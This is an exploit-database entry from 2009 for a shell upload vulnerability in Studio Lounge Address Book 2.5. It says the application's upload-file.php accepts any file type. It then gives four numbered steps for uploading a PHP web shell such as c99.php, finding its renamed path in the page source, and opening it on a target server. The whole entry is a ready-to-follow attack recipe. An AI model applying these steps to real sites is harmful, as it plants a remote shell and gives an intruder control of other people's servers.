Studio Lounge Address Book 2.5 (profile) Shell Upload Vulnerability

2009-04-20T00:00:00
ID 1337DAY-ID-5066
Type zdt
Reporter JosS
Modified 2009-04-20T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===================================================================
Studio Lounge Address Book 2.5 (profile) Shell Upload Vulnerability
===================================================================

Address Book 2.5 (profile) Remote Shell Upload Vulnerability
bug found by Jose Luis Gongora Fernandez (a.k.a) JosS


- download: http://www.studiolounge.net/2007/08/17/address-book-25

- vuln file: upload-file.php

  The upload-file.php doesn't check the type of archive 
  and you can uploaded the phpshell on the server.


~ [EXPLOITING]

1) /index2.php?title=add (upload your shell, ex: c99.php)
2) you should go to your "View Full Information" (ex: index2.php?title=fullview&id=150)
3) you view source code and search "profiles/imagethumb.php?s=" (ex: profiles/imagethumb.php?
   s=57b7b72739c79f02d990c4239c4169b9.php)

4) view shell: http://target/profiles/57b7b72739c79f02d990c4239c4169b9.php



#  0day.today [2018-01-01]  #